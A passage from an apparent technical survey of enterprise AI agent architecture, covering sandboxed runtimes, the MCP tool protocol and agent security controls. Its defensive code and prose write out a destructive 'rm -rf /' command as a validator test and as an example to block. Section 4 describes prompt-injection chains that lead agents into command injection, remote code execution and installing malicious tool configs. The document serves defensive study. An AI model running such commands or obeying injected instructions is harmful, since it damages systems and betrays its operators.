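    msg = {"jsonrpc": "2.0", "id": next(_ids), "method": method}
    if params is not None:
        msg["params"] = params
    return msg

list_tools = jsonrpc_request("tools/list")
call_tool = jsonrpc_request(
    "tools/call",
    {"name": "query_db", "arguments": {"sql": "SELECT 1"}},  # hypothetical tool
)

def integrations(models, tools):
    """Adapters needed without a shared protocol (M*N) versus with one (M+N)."""
    return {"point_to_point": models * tools, "via_protocol": models + tools}

print(json.dumps(call_tool))
print(integrations(5, 20))
```

With 5 agent frameworks and 20 tools, a shared protocol replaces 100 bespoke integrations with 25 protocol implementations.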

Orchestration and Multi-Agent Workflows. Many real tasks may be too complex for a single agent or might benefit from specialized agents collaborating. The architecture is therefore expanding to support multi-agent systems where agents communicate or coordinate. Some protocols, like Agent-to-Agent (A2A) messaging, are emerging to standardize inter-agent communication (for instance, Google's Agent2Agent protocol and Microsoft's adoption of A2A in their framework). In a multi-agent setup, you might have one agent that specializes in planning, another in executing code, another in validation, etc., passing context or subtasks among them. Orchestration frameworks now often support deterministic workflows (where the chain of sub-tasks is predefined, akin to a business process) alongside LLM-driven orchestration (where agents dynamically decide how to break down and assign tasks). For example, Microsoft's new open-source Agent Framework explicitly supports both Agent Orchestration (LLM-driven, creative, adaptive) and Workflow Orchestration (fixed logic, for reliable repeatability) within one runtime. This framework, released in late 2025, consolidates previous research prototypes (like Semantic Kernel's planner and AutoGen from MSR) into an enterprise-ready SDK. It emphasizes connectors to enterprise systems, open standards (MCP, A2A, OpenAPI), and built-in telemetry, approvals, and long-running durability to meet enterprise needs. The trend here is that agents are being treated as first-class components of software systems, with the same expectations for monitoring, security, and lifecycle management as microservices or human-in-the-loop workflows.

Summary: The architecture of modern agent systems is coalescing around a modular, layered design. A secure sandboxed execution layer ensures that any generated code or commands run in isolation with controlled privileges. A standardized tool interface layer (MCP and similar protocols) decouples agent reasoning from the implementation of tools, enabling a rich ecosystem of reusable capabilities. On top of these, orchestration mechanisms allow composing multiple agents and tools into larger autonomous workflows, while providing hooks for humans and existing DevOps processes to supervise and intervene when needed. In the following sections, we delve deeper into three crucial aspects of enterprise agent systems: (a) the sandbox and runtime isolation mechanisms, (b) the emerging standards and ecosystems of tools/plugins, and (c) the security, governance, and observability considerations that are top-of-mind as organizations deploy these systems.

2. Isolated Execution Environments for Agents (Sandboxing)

Running untrusted or machine-generated code has always been risky – the difference now is that with LLM agents the code is being generated and executed on the fly, without a human vetting each command. This opens the door to accidental failures or even malicious exploits if the agent is tricked or if its outputs are unsafe. As a result, sandboxing has become a foundational requirement for agent systems. Sandboxing in this context means confining the agent's actions (code execution, file system writes, network calls, etc.) to an environment where it can't harm other processes or breach data it shouldn't access.

Table 1: Research / OSS Projects (Papers, Benchmarks, Open-Source Runtimes)

Name	Category	Sandbox/Isolation Boundary	Key Capabilities	Reference
Kubernetes SIGs: agent-sandbox	OSS (K8s Primitives/Controller)	Sandbox CRD in Kubernetes (with Template/Claim/WarmPool)	Manage "isolated + stateful + singleton" workloads; standardized API for agent runtime	GitHub
AIO Sandbox (agent-infra/sandbox)	OSS (All-in-One Environment)	Single Docker container (integrated multi-tools)	Browser/Shell/File/MCP/VSCode Server unified; unified workspace for agents & dev	GitHub
Alibaba OpenSandbox	OSS (Universal Sandbox Platform)	Unified protocol + multi-language SDK + sandbox runtime	Universal sandbox foundation for command/file/code/browser/agent execution	GitHub
E2B (e2b-dev/E2B)	OSS (Cloud Sandbox Infrastructure)	Cloud-isolated sandbox (SDK controlled)	Run AI-generated code in cloud; Python/JS SDK; for agent code interpreter	GitHub
E2B Desktop (e2b-dev/desktop)	OSS (Virtual Desktop Sandbox)	Isolated virtual desktop environment	"Computer Use" agent: desktop GUI, customizable dependencies, per-sandbox isolation	GitHub
LLM Sandbox (vndee/llm-sandbox)	OSS (Lightweight Code Sandbox)	Containerized isolation (configurable security policies)	Run LLM-generated code; customizable security policies and isolated container environments	GitHub
SkyPilot Code Sandbox (alex000kim/…)	OSS (Self-hosted Execution Service)	SkyPilot deployment + Docker sandboxing	Self-hosted, multi-language execution, token auth, MCP integration (for agent tools)	GitHub
Microsandbox (zerocore-ai/microsandbox)	OSS (microVM Execution Environment)	Hardware-isolated microVM (fast startup)	Run untrusted workloads via microVM; emphasis on isolation strength and startup speed	GitHub
ERA (BinSquare/ERA)	OSS (Local microVM Sandbox)	Local microVM ("microVM with container ease-of-use")	Run untrusted/AI-generated code locally with hardware-level isolation	GitHub
SandboxAI (substratusai/sandboxai)	OSS (Runtime)	Isolated sandbox	Secure execution runtime for AI-generated Python code and shell commands	GitHub
Python MCP Sandbox (JohanLi233/mcp-sandbox)	OSS (MCP Server)	Docker container isolation	Expose "secure Python execution" as a tool to agent/LLM clients via MCP	GitHub
Code Sandbox MCP (Automata-Labs-team/…)	OSS (MCP Server)	Docker container isolation	MCP server: provide containerized secure code execution environment for AI applications	GitHub
ToolSandbox (Apple)	Research + OSS (Evaluation Benchmark)	Evaluation sandbox with "stateful tool execution + user simulator"	Evaluate LLM tool-use: state dependencies, multi-turn dialogue, dynamic evaluation; open-source	arXiv
ToolEmu	Research (Risk Evaluation Framework)	LM-emulated sandbox (simulate tool execution with LM)	Use LM to simulate tool execution for scalable agent risk testing; includes automatic safety evaluator	OpenReview
HAICOSYSTEM	Research + OSS (Safety Evaluation Ecosystem)	Modular interaction sandbox (human-agent-tool multi-turn simulation)	Multi-domain scenario simulation and multi-dimensional risk evaluation (operational/content/social/legal); code platform	arXiv
EnterpriseBench	Research (Enterprise Environment Evaluation Sandbox)	"Evaluation environment" for enterprise tasks/tools/data	Evaluate LLM agents in enterprise scenarios (task execution, tool dependencies, data retrieval)
Managing Linux servers with LLM-based AI agents	Research (Empirical Evaluation)	Dockerized Linux sandbox	Let agents execute server tasks in Dockerized Linux environment and evaluate performance	ScienceDirect
Multi-Programming Language Sandbox for LLMs	Research (Multi-language Execution Sandbox)	Container-isolated sub-sandbox	Multi-language compilation/execution isolation (sub-sandbox isolated from main environment)	arXiv
awesome-sandbox (restyler/awesome-sandbox)	OSS (Ecosystem Overview/List)	N/A (aggregation)	Systematic curated list & analysis of "code sandboxing solutions"; good entry point for long-tail coverage	GitHub

Note: Achieving exhaustive coverage is impractical (especially given the long tail of the MCP ecosystem), so this table covers mainstream/representative projects plus ecosystem indexes. The awesome-sandbox list serves as an entry point for additional coverage.

Table 2: Commercial / Cloud Service Projects (Agent Sandbox / Code Sandbox / Runtime)

Product/Service	Vendor	Isolation/Execution Model	Key Capabilities	Reference
Code Interpreter (Tools)	OpenAI	Managed Python sandbox execution	Model writes and runs Python; for data analysis/coding/math	OpenAI Platform
Code Interpreter (Assistants on Azure)	Microsoft Azure OpenAI	Managed Python sandbox execution	Assistants API runs Python in sandbox environment (per Azure docs)	Microsoft Learn
E2B (Managed Cloud)	E2B	Managed cloud sandbox (enterprise agent cloud)	Sandbox as agent runtime; emphasis on concurrency and execution infrastructure	E2B
Daytona	Daytona	Managed/platform sandbox infrastructure	"Stateful infra for AI agents"; ultra-fast creation and isolated execution	Daytona
Agent Sandbox	Novita AI	Managed agent runtime	Low startup latency, high concurrency; code execution/network access/browser automation	Novita AI
Sandboxes (Desktop / GUI)	Bunnyshell	Firecracker microVM virtual desktop	For GUI/Computer Use: isolated desktop, VNC/noVNC, desktop automation API	Bunnyshell
Agent Sandbox on GKE	Google Cloud (GKE)	Deploy/run Agent Sandbox controller on GKE	Isolated execution of untrusted commands in cluster; official installation and usage guide	Google Cloud Documentation
AgentCore "agent sandbox"	AWS Bedrock AgentCore	Console testing sandbox	AWS docs: test agents in agent sandbox	AWS Documentation
Modal Sandboxes	Modal	Modal platform sandbox execution unit	Official example: build code-executing agent with Modal Sandboxes + LangGraph	Modal
Vercel Sandbox	Vercel	Vercel managed execution environment (Sandbox product)	For scalable execution (fluid compute/pay-per-active-CPU, etc.)	Vercel
Docker Sandboxes (Experimental)	Docker	Local containerized sandbox (for coding agents)	Docker official: use local isolated environments to run coding agents, enforce boundaries	Docker

Agent Sandbox on Kubernetes. The Kubernetes-based Agent Sandbox, spearheaded by Google and open-sourced as a SIG project in late 2025, exemplifies state-of-the-art sandbox design. A sandbox instance is essentially a microVM (micro virtual machine) launched per agent session, managed through K8s APIs. Internally it leverages technologies like gVisor (userspace kernel) to intercept syscalls and Kata Containers (lightweight VM isolation) to provide a robust security boundary. This means even if an agent's code tries to perform a malicious syscall or exploit a kernel bug, it's constrained within a sandbox kernel that has minimal privileges on the host. The sandbox also limits network access by default on GKE (only allowing what's necessary for the agent tools), reducing the risk of an agent scanning internal networks or exfiltrating data. At KubeCon NA 2025, Google showcased how they can schedule thousands of sandbox pods in parallel, thanks to the lightweight nature of gVisor, and how pre-warmed sandbox pools enable sub-second startup latencies even with the isolation. This addresses the performance concern that isolation often introduces: by carefully engineering snapshot/restore and pooling, the overhead can be kept low enough for interactive use.

From an API standpoint, the Sandbox CRD provides features tailored to long-running agent processes: you can specify resource limits, attach persistent volumes for agent state, and use the Kubernetes scheduler to place sandboxes on appropriate nodes (e.g. ones with GPU if the agent needs it). It also has life-cycle controls like scheduled deletion (to clean up sandboxes after use) and the mentioned pause/resume. Collectively, these features fulfill OWASP's top recommendation for mitigating agent risks: "system isolation, access segregation, permission management, command validation, and other safeguards". In fact, OWASP added an entry to its Top 10 for LLMs called "Agent Tool Interaction Manipulation" – the risk of an AI agent being induced to misuse its tools or perform unintended actions. The primary defense listed is to run the agent in a locked-down environment with fine-grained permission controls on what it can do. By confining an agent to a Kubernetes sandbox with only specific Kubernetes API access (or none at all beyond its tools) and no broad host access, even a compromised agent will have limited blast radius.
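Of the safeguards quoted above, command validation is the easiest to sketch in isolation. The example below checks an agent-proposed command line against a small allowlist of programs and flags; the allowlist contents are hypothetical, and the returned argument vector is meant to be executed without a shell, inside the sandbox, as one layer among several.

```python
import shlex

# Hypothetical policy: program name -> flags it may be given.
ALLOWED_FLAGS = {"ls": {"-l", "-a"}, "cat": set()}

def validate_command(line):
    """Return argv if the command passes the allowlist, else None."""
    try:
        argv = shlex.split(line)
    except ValueError:              # e.g. unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_FLAGS:
        return None
    for arg in argv[1:]:
        if arg.startswith("-") and arg not in ALLOWED_FLAGS[argv[0]]:
            return None
    return argv

print(validate_command("ls -l /tmp"))
print(validate_command("rm -rf /"))
```

Because the result is an argv list rather than a shell string, characters such as `;` are never interpreted as command separators.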

Local Sandboxing Solutions. Not all organizations use Kubernetes or need cloud-scale multi-tenancy; for individual developers or on-prem deployment, lighter-weight sandbox solutions are emerging. One notable project is ERA (by BinSquare), which provides a local sandbox for running AI-generated code with "microVM security guarantees plus containers ease of use". ERA uses technologies like krunvm (a libkrun-based microVM runner) under the hood, orchestrated in a way that feels like using Docker containers. The idea is to give developers a quick way to test AI-written scripts safely on their laptop or CI pipeline, without having to set up full Kubernetes. Similarly, some frameworks allow using WebAssembly (Wasm) sandboxes for certain tasks (since Wasm can restrict file and network access for code running within it). The InfoQ article on sandboxing mentions Lightning AI's LitSandbox and a library called container-use as alternatives, which likely explore isolating Python execution or providing wrapper APIs that simulate a sandbox. While these are not yet as standardized as the Kubernetes Agent Sandbox, they indicate a broad interest in making sandboxing accessible across environments.

Integration with Agent Frameworks. Modern agent frameworks are starting to build in assumptions about sandboxing. For example, LangChain (one of the earliest agent libraries) historically would just execute Python code or bash commands directly on the host, which is obviously dangerous in production. By late 2025, we see frameworks like LangGraph 1.0 (the evolution of LangChain's agent module) emphasizing "durable and safe" execution, and CrewAI (another open-source agent framework) adding features for asynchronous tool execution and monitoring to potentially plug into sandboxed runtimes. Microsoft's Agent Framework integrates with their Azure Foundry services, which likely means an agent's code execution can be routed to a managed sandbox (e.g. an isolated Azure Function or container instance) – in their blog they highlight "enterprise-grade deployment from the beginning", including security and compliance hooks. We also see new tools like Aspire's AI agent isolation module (by Microsoft) which aims to allow developers to run multiple agent instances in parallel without conflict, hinting at port isolation and MCP proxy layers. All these efforts point to execution isolation becoming a default part of agent system design. It's no longer assumed that an agent's code runs in the same process as the host application or with full OS privileges – instead, agents run in a contained, observable slot, much like how web browsers run untrusted JavaScript in a sandboxed process.

Transactional and Fault-Tolerant Execution. A more sophisticated angle on sandboxing is making execution fault-tolerant. If an agent's action fails or does something unwanted, can we roll it back? One recent research prototype, Fault-Tolerant Sandboxing for AI Coding Agents, introduced a transactional file system wrapper for agent execution. It intercepts file system writes and system changes during an agent's tool use, and if the agent misbehaves or a policy violation is detected, the sandbox can roll back to a clean snapshot. In their experiments, 100% of unsafe actions were intercepted and rolled back, at a cost of ~14.5% performance overhead. However, they note a key limitation: this works for local state (files, processes) but not for external side effects. If the agent made a cloud API call that created resources or sent emails, a local rollback doesn't undo those. This is pushing the conversation toward distributed transaction semantics for agents, that is, treating a sequence of tool API calls as a saga that might need compensating actions if aborted. While not solved yet, it's a recognized gap (researchers call for integrating compensating transactions for external tools to truly sandbox at the multi-system level). For now, sandboxing primarily ensures the agent's local environment can be reset to a safe state even if one step goes awry.
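The snapshot-and-rollback idea for local state can be sketched with a plain directory copy. This is not the paper's transactional file system wrapper: it swaps in a simpler copy-based snapshot, and the function name, the `action` callback, and the `is_violation` policy check are all hypothetical. As the text notes, nothing here can undo external side effects.

```python
import shutil
import tempfile
from pathlib import Path

def run_transactional(workdir, action, is_violation):
    """Run action(workdir); restore workdir from a snapshot if the policy check fails.

    Returns True if the changes were kept, False if they were rolled back.
    """
    workdir = Path(workdir)
    with tempfile.TemporaryDirectory() as tmp:
        snapshot = Path(tmp) / "snapshot"
        shutil.copytree(workdir, snapshot)       # copy-based snapshot of local state
        try:
            action(workdir)
            violated = is_violation(workdir)
        except Exception:
            violated = True                      # a crashing action is also rolled back
        if violated:
            shutil.rmtree(workdir)
            shutil.copytree(snapshot, workdir)   # restore the clean state
        return not violated
```

A usage example: pass an `action` that writes files into the working directory and an `is_violation` check that inspects the result, for instance by looking for an unexpected script; when the check fires, the directory is returned to its pre-action contents.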

Human Takeover and Hybrid Sandboxes. An intriguing development in sandbox design is support for human-in-the-loop interventions not just via yes/no approval prompts, but via full manual control of the sandbox. The idea is that if an agent reaches a step where it is stuck or needs privileged action (like entering a password or solving a tricky problem), a human operator can seamlessly take over the agent's sandbox session, do what's needed, and then hand control back to the AI. The research prototype AgentBay embodies this concept: it provides a unified isolated session that the AI agent can control via API (e.g. issuing OS commands, browser actions) and that a human can remote into graphically at any moment. AgentBay implements a custom Adaptive Streaming Protocol (ASP) to make this possible with very low latency. Unlike traditional screen sharing (RDP/VNC), ASP dynamically switches between sending high-level commands and video frames, adjusting to network conditions and whether the AI or human is currently in charge. The result is a much smoother experience for the human supervisor, even on weaker networks. In tests, allowing a human to intervene in AgentBay's sandbox improved task success rates by over 48% on complex benchmarks, showing the value of fluid HITL (Human-In-The-Loop) control. This approach directly addresses enterprise needs for control: rather than the agent being a black-box automation that might get stuck, it becomes a cooperative automation that an analyst or engineer can jump into whenever needed, without compromising the isolation or requiring the task to be restarted. We foresee future enterprise agent platforms offering a "panic button" or agent assist mode that spawns a secure VNC/Browser session for an operator, all actions logged, then closes back to autonomous mode.

In summary, sandboxing in agent systems has evolved into a multi-faceted capability: it's not only about securing the environment (with VMs, syscall filters, network restrictions), but also about managing the agent's lifecycle and state (persistent storage, snapshots, warm pools) and facilitating controlled handoffs (pause/resume and human takeover). The investments by major players – e.g. Google building Agent Sandbox as a CNCF project – indicate that these sandboxing techniques will likely become standard infrastructure in cloud platforms. Just as Kubernetes gave us primitives for scalable microservices, we are now getting primitives for safe autonomous agent execution on the cloud and the edge.

3. Tool Ecosystem and Standardization: From Plugins to MCP

In parallel with sandboxing the runtime, the industry has tackled the tool integration problem for agents. Early agent implementations often hard-coded a set of tools or required developers to write custom "plugin" adapters for each use case. This doesn't scale when enterprises might want agents to access dozens of internal APIs, databases, and third-party services. The last six months have seen a strong push toward standardizing how agents discover and use tools, yielding a more interoperable ecosystem.

3.1 Model Context Protocol (MCP) and the AAIF

Model Context Protocol (MCP) has emerged as the de facto standard protocol in this space. As mentioned, MCP defines a client-server schema where the AI agent (client) can list what tools a server offers, call those tools with JSON arguments, and receive results. It also covers things like authentication handshakes (e.g. OAuth flows to let an agent "login" to use a tool on a user's behalf) and streaming responses (for tools that send incremental results). By late 2025, MCP's momentum was cemented by the formation of the Agentic AI Foundation (AAIF) under the Linux Foundation. In December 2025, the Linux Foundation announced AAIF with MCP as a founding contribution alongside OpenAI's AGENTS.md and Block's Goose. The goal is to provide a neutral, open governance home for these agent standards so that no single company controls them. The AAIF launch PR notes MCP had already exploded in adoption: over 10,000 MCP servers published covering everything from dev tools to Fortune 500 internal integrations, and support built into major AI platforms including Claude, ChatGPT, GitHub Copilot, Google Gemini, VS Code, Cursor, and many others. This is remarkable considering MCP was only open-sourced in late 2024 – it resonated because it addressed an urgent pain point: without it, every AI vendor and every enterprise would be duplicating integrations. By rallying around MCP, the community effectively agreed on a "lingua franca" between agents and tools.
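The list-then-call exchange can be sketched with a toy in-memory server. The sketch assumes MCP's JSON-RPC 2.0 framing with the `tools/list` and `tools/call` methods; the field names follow our reading of the specification and should be checked against the current version. The `add` tool and the `handle` function are hypothetical, and transport, initialization, and authentication are left out.

```python
import json

# Hypothetical tool registry for the demo; "handler" is internal and never
# sent to the client.
TOOLS = {
    "add": {
        "description": "Add two integers (hypothetical demo tool).",
        "inputSchema": {
            "type": "object",
            "properties": {"a": {"type": "integer"}, "b": {"type": "integer"}},
            "required": ["a", "b"],
        },
        "handler": lambda args: args["a"] + args["b"],
    }
}


def _error(req_id, code, message):
    return json.dumps({"jsonrpc": "2.0", "id": req_id,
                       "error": {"code": code, "message": message}})


def handle(request_json):
    """Dispatch one JSON-RPC request string and return the response string."""
    req = json.loads(request_json)
    method, params = req["method"], req.get("params", {})
    if method == "tools/list":
        result = {"tools": [
            {"name": name, "description": tool["description"],
             "inputSchema": tool["inputSchema"]}
            for name, tool in TOOLS.items()
        ]}
    elif method == "tools/call":
        tool = TOOLS.get(params.get("name"))
        if tool is None:
            return _error(req["id"], -32602, "unknown tool")
        value = tool["handler"](params.get("arguments", {}))
        result = {"content": [{"type": "text", "text": str(value)}],
                  "isError": False}
    else:
        return _error(req["id"], -32601, "method not found")
    return json.dumps({"jsonrpc": "2.0", "id": req["id"], "result": result})
```

Because every request and response is a structured JSON object, a client library or gateway can log and inspect each one, which is the property the auditing discussion later relies on.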

From an enterprise perspective, MCP brings several benefits:

Interoperability: A tool (say a database query interface) can be implemented once as an MCP server and then used by different agents (Anthropic's, OpenAI's, self-hosted ones) without custom adapters. This has analogies to drivers or connectors in classical software – build it once, use anywhere.
Security and Auditability: MCP messages are structured (JSON) and typically go through a client library in the agent runtime, where they can be logged and inspected. This makes it easier to audit what the agent asked a tool to do, as opposed to the agent running free-form shell commands that are hard to intercept. The protocol includes a capability advertisement step (the server tells what it can do), which can be checked against policies. It also often requires an auth handshake (e.g. OAuth) for the agent to gain access to the tool on behalf of a user, which means existing identity systems can mediate access.
Modularity and Future-proofing: As InfoQ summarized, MCP shifts integration from a tangled web into a modular architecture, reducing the "plugin fatigue" problem and making it easier to add new tools or swap out models. It also levels the playing field – small open-source projects can publish MCP servers that become as easily usable as those from big vendors, fostering a community ecosystem of tools.
Neutral Governance: With AAIF, companies like AWS, Google, Microsoft, Anthropic, and OpenAI are all at the same table (indeed all are listed as platinum members). This reduces the risk that MCP splinters into competing versions; it's likely to become analogous to HTML or SQL – a baseline standard that everyone implements, with maybe some extensions.

It's worth noting that MCP is evolving to cover more than just "traditional API calls." Recent extensions include Agent-to-Agent messaging (so an agent can expose itself as a tool to others via MCP) and binary data support (for image and file transfer). The AGENTS.md standard, also under AAIF, complements MCP by providing a way for software projects to declare to agents how to interact with them. AGENTS.md is essentially a README for AI agents, placed in a code repo to describe the project, its build/test tools, key contexts, and constraints. Over 60k open-source repos have adopted AGENTS.md to guide coding agents. By standardizing this, when an agent (like GitHub Copilot or Cursor) is working on a new codebase, it can automatically read AGENTS.md to understand the project's specific commands (e.g. how to run tests) rather than relying on general knowledge. This reduces errors and makes code-writing agents more reliable across different environments.

MCP Tool Ecosystem. Many companies and open-source teams have published MCP servers for their systems. For instance, GitHub released an official GitHub MCP Server that exposes GitHub operations (issues, PRs, repo contents, etc.) via MCP. This allows an agent to perform GitHub actions (like creating an issue or commenting on a PR) in a safe way – the server enforces GitHub's API policies and scopes. Similarly, we have MCP servers for databases (SQL tools), cloud resources (AWS, Azure MCP servers), information lookups (Wikipedia, web search), and even OS-level tasks (there are MCP servers that wrap shell commands or Docker). A typical enterprise might run a suite of internal MCP servers: one for their ticketing system, one for their customer database, one for DevOps (Kubernetes control like the mcp-server-kubernetes we saw). By doing so, they create a catalog of approved tools that their AI agents can use. Some companies are building MCP Gateways or registries to manage this catalog, which we'll discuss in the security section.

Local-First and Offline Agents. While MCP often assumes a client (agent) connecting to a server over HTTP, it's flexible enough to work in "all local" scenarios too (using stdio pipes). The Goose framework (contributed by Block to AAIF) is described as a "local-first AI agent framework". Goose uses MCP for tool extensions – meaning you can run goose agents on your laptop, and they can spin up local MCP servers for local tools (say, accessing a local filesystem or application) without needing cloud connectivity. This is important for cases where data privacy requires everything to remain on-prem or on-device. It also means an enterprise could package up an agent + tool suite to run entirely in an isolated network (e.g. an AI agent that helps with internal network diagnostics, running in a secure enclave with no internet access, but with MCP hooking into internal systems). The push toward standardization via MCP doesn't imply centralization in the cloud – on the contrary, it can democratize who provides tools (open-source implementations, self-hosted services, etc.) as long as they speak the protocol.

Beyond MCP: Other Standards. While MCP is currently the frontrunner, there are other noteworthy efforts. OpenAPI-based tool use: some agent frameworks allow importing any OpenAPI spec and will auto-generate an "agent tool" from it. For example, Microsoft's Agent Framework highlights that any REST API with an OpenAPI definition can be instantly turned into a tool, with the framework handling schema parsing and secure invocation. This is complementary to MCP: one could imagine MCP servers automatically exposing an OpenAPI definition, or vice versa. Another is the concept of capability description languages – OpenAI's Function Calling spec is one example, where the model is told function signatures and it outputs JSON for calls. Some researchers propose more formal schemas for tool affordances. At the moment, however, MCP seems to be where those threads converge: it provides a structured way for an agent to query "what can I do?" and then invoke a function with arguments, which is essentially function calling over a channel. It's likely we'll see alignment or bridging between OpenAPI, JSON-RPC, and whatever else emerges, to avoid fragmenting this again.

In essence, if sandboxing addresses the agent's "body," MCP addresses the agent's "arms and legs". It standardizes how the agent reaches out to interact with the world. This was a necessary step for agents to become truly useful in enterprise settings, because no single vendor can supply every integration. By lowering the integration barrier, companies can leverage a far broader set of tools. However, as we'll discuss next, giving an AI agent access to many tools also broadens the attack surface and governance burden – thus, standardization and security have to go hand in hand.

4. Security, Governance, and Trust in Agent Systems

Deploying autonomous agents in an enterprise inherently raises the question: how do we trust them? Unlike a deterministic script, an AI agent can come up with unexpected actions, and it might be influenced by inputs (or adversaries) in ways we can't fully predict. Over the past months, a significant focus of both practitioners and researchers has been on closing the "trust gap" – ensuring that agents do what they're supposed to and nothing more, or at least that we can detect and mitigate when they misbehave. Several key themes have emerged: permission and policy models, supply chain security of tools, prompt injection defenses, auditing and observability, and fail-safe mechanisms. We'll examine each in turn.

4.1 Prompt Injection and Confused Deputy Problems

Prompt injection – where an external input is crafted to manipulate the agent's LLM into ignoring its instructions or performing unintended actions – has proven to be a very real threat. In the context of agent tools, prompt injection can become a "confused deputy" attack: the LLM is the deputy that has privileges (access to tools) and the attacker exploits it via crafted input (a prompt) to misuse those privileges. A simple example: an attacker might embed a malicious command in a user-provided email, which the agent then dutifully executes with its shell tool. Real incidents and proofs-of-concept have shown this is not just theoretical. The consensus in discussions (e.g. on Hacker News) is that prompt injection is analogous to XSS (cross-site scripting) in web apps – you cannot fully eliminate it just by sanitizing inputs, because the model's behavior with arbitrary text is hard to constrain. Thus, relying solely on prompt-based safeguards (like "don't execute if user says to do something bad") is brittle.

The more robust approach is structural: limit what the agent can do even if it's tricked. This means enforcing policy at the tool invocation layer. For instance, if the agent tries to run a shell command, have a policy that disallows rm -rf or network calls to sensitive endpoints. If it uses a database tool, ensure it cannot query tables it shouldn't. This is where sandboxing and permission models overlap. In a sandbox, you can intercept system calls – e.g. prevent file writes outside a certain directory, or limit network access to only whitelisted domains. With MCP, you can implement an allow-deny policy per tool – e.g. forbid a certain combination of API calls or detect if the arguments look suspicious (like a SQL query that's dumping all user data).
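A minimal sketch of such a check at the tool-invocation layer might look like the following. The allow-lists, the host name, and the function names are hypothetical; the checker only decides, and the caller is assumed to execute approved commands without a shell.

```python
import shlex
from urllib.parse import urlparse

# Hypothetical allow-lists; a real deployment would load these from policy.
ALLOWED_BINARIES = {"ls", "cat", "grep"}
ALLOWED_HOSTS = {"api.internal.example"}
SHELL_METACHARACTERS = set(";|&`$<>\n")


def shell_command_allowed(command):
    """Allow only simple commands whose binary is on the allow-list."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return False  # no chaining, pipes, substitution, or redirection
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes and similar
        return False
    return bool(argv) and argv[0] in ALLOWED_BINARIES


def network_call_allowed(url):
    """Allow only HTTPS requests to hosts on the allow-list."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS
```

The design choice here is default-deny: anything not explicitly listed is refused, so a successful prompt injection can still only reach the operations the policy already permits.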

One concrete advancement is the AgentBound research framework, which proposes attaching a declarative access control policy to MCP servers. Inspired by Android's app permissions, AgentBound allows a tool to declare what host resources it needs (files, network targets, etc.), and an admin can approve or limit those. At runtime, an enforcement engine monitors the agent's calls and blocks anything outside the allowed scope. Impressively, in its evaluation AgentBound auto-generated policies from source code for 296 popular MCP servers with about 80.9% accuracy, and it blocked the majority of malicious actions with negligible overhead. This suggests that intelligent tooling can help manage the policy burden: we can analyze a tool's code to infer "this tool should only ever need to access X API or Y file", then use that as a sandbox rule.
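The declare-then-enforce pattern can be illustrated with a small sketch. This is not AgentBound's actual manifest format or enforcement engine; the `Manifest` fields, the `is_allowed` function, and the paths and hosts are all hypothetical.

```python
import posixpath
from dataclasses import dataclass


@dataclass(frozen=True)
class Manifest:
    """Resources a tool server declares it needs (hypothetical format)."""
    read_paths: tuple = ()
    write_paths: tuple = ()
    hosts: tuple = ()


def _under(path, roots):
    # Normalize first so "../" segments cannot escape a declared root.
    norm = posixpath.normpath(path)
    return any(norm == root or norm.startswith(root.rstrip("/") + "/")
               for root in roots)


def is_allowed(manifest, kind, target):
    """Return True only if the access falls inside the declared scope."""
    if kind == "read":
        return _under(target, manifest.read_paths)
    if kind == "write":
        return _under(target, manifest.write_paths)
    if kind == "connect":
        return target in manifest.hosts
    return False  # unknown access kinds are denied by default
```

An admin would review the manifest once, and the enforcement layer would then call something like `is_allowed` on every file or network access the server attempts.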

Another line of defense is schema validation. Many tools expect inputs of a certain form (JSON with specific fields, numbers in ranges, etc.). If the agent's output deviates, it can indicate either a prompt injection or a model error. Rigorously validating the agent's action format before executing it can catch some attacks or mistakes. In fact, OWASP's recommendation of command validation falls here – e.g. if an agent tries to execute sudo rm -rf /, the sandbox or tool wrapper should detect that and refuse.
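As a rough illustration, a tool wrapper could validate arguments before executing anything. The sketch below uses a hand-rolled checker rather than a schema library, and the schema format, field names, and limits are hypothetical.

```python
# Hypothetical argument schema for a database query tool.
QUERY_TOOL_SCHEMA = {
    "query": {"type": str, "required": True},
    "limit": {"type": int, "required": True, "min": 1, "max": 100},
}


def validate(args, schema):
    """Return a list of problems; an empty list means the call may proceed."""
    if not isinstance(args, dict):
        return ["arguments must be an object"]
    errors = [f"unexpected field: {key}" for key in args if key not in schema]
    for key, rule in schema.items():
        if key not in args:
            if rule.get("required", False):
                errors.append(f"missing field: {key}")
            continue
        value = args[key]
        # Exact type match, so that True/False are not accepted as integers.
        if type(value) is not rule["type"]:
            errors.append(f"wrong type for {key}")
            continue
        if "min" in rule and value < rule["min"]:
            errors.append(f"{key} below minimum {rule['min']}")
        if "max" in rule and value > rule["max"]:
            errors.append(f"{key} above maximum {rule['max']}")
    return errors
```

Rejecting unexpected fields matters as much as checking the expected ones: an injected instruction often shows up as an extra argument the tool never asked for.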

It's widely acknowledged that prompt injection cannot be fully solved at the model level, so enterprise systems are layering these runtime controls. Some are even exploring two-model setups: one model generates a plan or interprets user input without any tools (and thus with no privileges), then a separate "execution model" runs with tools enabled but receives a much more constrained input (only the sanitized plan). This is analogous to separating policy decision and policy enforcement. However, this approach is in its infancy – researchers have noted it's tricky to ensure the two models stay in sync and that the first model doesn't inadvertently become a covert channel for bad instructions.

4.2 Tool Supply Chain Security

As the MCP tool ecosystem grows, a new class of security concerns appears: the tools themselves may have vulnerabilities or could be malicious. We've effectively extended our "attack surface" to any code that implements a tool API. In July 2025, security researchers disclosed critical flaws in some community-developed MCP servers:

The MCP Server for Kubernetes (an MCP tool that allowed agents to run kubectl commands on a cluster) had a command injection flaw. It constructed shell commands from user input without sanitization, so an attacker could embed | or && to execute arbitrary commands on the host. Not only that, the advisory demonstrated a prompt injection chain: if an agent was asked to read a pod's logs (which contained malicious instructions), the agent might then call a vulnerable kubectl tool with those instructions, leading to RCE (Remote Code Execution) on the MCP server host. This is a vivid example of how an innocuous high-level task (read logs) can cascade into a full compromise via weaknesses in the tool implementation. It underscores that agent security is only as strong as the weakest tool in its arsenal.
Another advisory, for mcp-package-docs (a tool for reading package documentation), described a similar shell injection issue. Essentially, many early tools naively used exec() on strings, a practice long known to be dangerous in any software context.
The AI coding assistant Cursor found an even more subtle exploit: an agent could be tricked into writing a malicious MCP server configuration to disk (effectively "installing" a new tool) which would then be loaded and executed, giving the attacker code execution on the system. In response, Cursor had to forbid agents from writing to certain config directories.
